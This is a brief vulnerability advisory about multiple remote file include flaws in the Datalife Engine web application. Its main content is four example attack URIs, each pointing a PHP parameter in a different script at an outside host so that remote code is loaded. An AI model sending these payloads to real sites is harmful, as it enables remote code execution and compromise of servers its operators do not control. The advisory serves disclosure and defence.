Datalife Engine Multiple Remote File Include Vulnerabilities

Datalife Engine Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com